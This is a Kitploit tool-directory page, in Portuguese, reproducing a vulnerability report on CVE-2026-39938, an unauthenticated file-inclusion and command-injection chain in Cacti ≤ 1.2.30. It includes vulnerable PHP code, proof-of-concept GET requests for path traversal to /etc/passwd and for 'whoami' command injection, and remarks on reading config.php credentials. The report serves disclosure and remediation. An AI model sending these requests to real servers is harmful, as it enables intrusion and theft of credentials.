Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39938 — LFI pré-autenticação leva a RCE | Kitploit
Ferramentas/GitHubGitHub/kx00007/cve-2026-39938
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubkx00007/cve-2026-39938

CVE-2026-39938

LFI pré-autenticação leva a RCE

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Relatório de Vulnerabilidade: RCE Não Autenticado no Cacti em Imagem de Gráfico

Pesquisador: K | Produto: Cacti ≤ 1.2.30 | CVE: CVE-2026-39938


[01] Resumo da Vulnerabilidade

CampoValor
ProdutoCacti — A Solução Completa de Gráficos Baseada em RRDtool
Versão(ões) Afetada(s)≤ 1.2.30
Classe de VulnerabilidadeCWE-22: Travessia de Caminho (LFI) → CWE-78: Injeção de Comandos do SO
Vetor de AtaqueRede
AutenticaçãoNenhuma exigida (bypass da conta de convidado)
Interação do UsuárioNenhuma
Pontuação CVSSv3.19.8 — CRÍTICO
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

O Cacti ≤ 1.2.30 está vulnerável a Inclusão de Arquivo Local (LFI) não autenticada por meio do parâmetro graph_theme em graph_image.php, encadeada a Execução Remota de Código (RCE) por meio de injeção de comandos do SO via cacti_escapeshellarg() no Windows.


[02] Fluxo da Vulnerabilidade

root@kitploit:~
HTTP Request
    │
    ▼
graph_image.php
    │
    ├── $guest_account = true  →  Auth bypass (no login needed)
    │
    ├── graph_theme param  →  LFI (CWE-22)
    │       └── Path traversal via basename() bypass
    │
    └── Other params (graph_height, etc.)
            └── cacti_escapeshellarg()  →  OS injection (CWE-78)
                    └── proc_open()  →  RCE

[03] Causa Raiz: LFI via graph_theme

O parâmetro graph_theme é sanitizado de forma insuficiente. A correção tentou usar basename(), mas isso é trivialmente contornável — um caminho como themes/../../etc/passwd passa pela validação do basename() enquanto ainda percorre diretórios.

Caminho de código vulnerável em graph_image.php:

root@kitploit:~
$theme = basename($_GET['graph_theme']); // basename() is NOT sufficient
include_once("./include/theme_" . $theme . ".php"); // LFI

A correção na versão 1.2.31 substitui basename() por cacti_validate_theme(), que usa uma lista de permissões do sistema de arquivos.


[04] Pré-requisitos


[05] Prova de Conceito

LFI — Ler arquivos arbitrários

root@kitploit:~
GET /cacti/graph_image.php?local_graph_id=1&graph_theme=../../../../etc/passwd

Cadeia LFI → RCE

root@kitploit:~
GET /cacti/graph_image.php?local_graph_id=1&graph_height=100" & whoami & "&action=view

A injeção de comandos do SO já fornece Execução Remota de Código (RCE) direta, portanto, o LFI não é necessário para comprometer o sistema.

No entanto, do ponto de vista de um pesquisador, se ambos os problemas forem considerados em conjunto:

  • O LFI pode ser usado para ler o config.php e obter credenciais do banco de dados ou dados de configuração sensíveis.
  • A injeção de comandos do SO pode ser usada para executar comandos do sistema e obter controle do servidor.
  • O LFI também pode ajudar a confirmar alterações no sistema (por exemplo, verificar se um arquivo ou payload foi criado com sucesso).

Isso mostra que combinar múltiplas vulnerabilidades aumenta o impacto geral e torna a exploração mais fácil e confiável.


[06] Avaliação de Impacto

PilarNívelDescrição

[07] Pontuação CVSS v3.1

Pontuação: 9.8 — CRÍTICO


[08] Remediação

PrioridadeAção
ImediataAtualizar para o Cacti 1.2.31 ou posterior

👤 Autor

MENG HOKSENG
Pesquisador de Segurança Independente


Referências:

  • GHSA-rm7p-qcqm-x5m6
  • https://www.cve.org/CVERecord?id=CVE-2026-39938
  • https://github.com/Cacti/cacti/pull/6966
Baixar ferramenta
CondiçãoProbabilidadeObservações
Cacti roda no WindowsComum em empresasA falha no escape do cmd.exe permite RCE
Conta de convidado habilitadaComum — frequentemente padrãoO usuário convidado permite visualização pública de gráficos
Pelo menos um gráfico existeQuase universallocal_graph_id=1 presente após a instalação
RRDtool instaladoExigido pelo CactiSempre presente
Confidencialidade
ALTO
Acesso total de leitura ao sistema de arquivos do servidor web (config, credenciais do banco de dados)
IntegridadeALTOExecução arbitrária de comandos, implantação de web shell
DisponibilidadeALTOEncerramento de processos, corrupção de arquivos, DoS
MétricaValor
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
EscopoInalterado
ConfidencialidadeAlta
IntegridadeAlta
DisponibilidadeAlta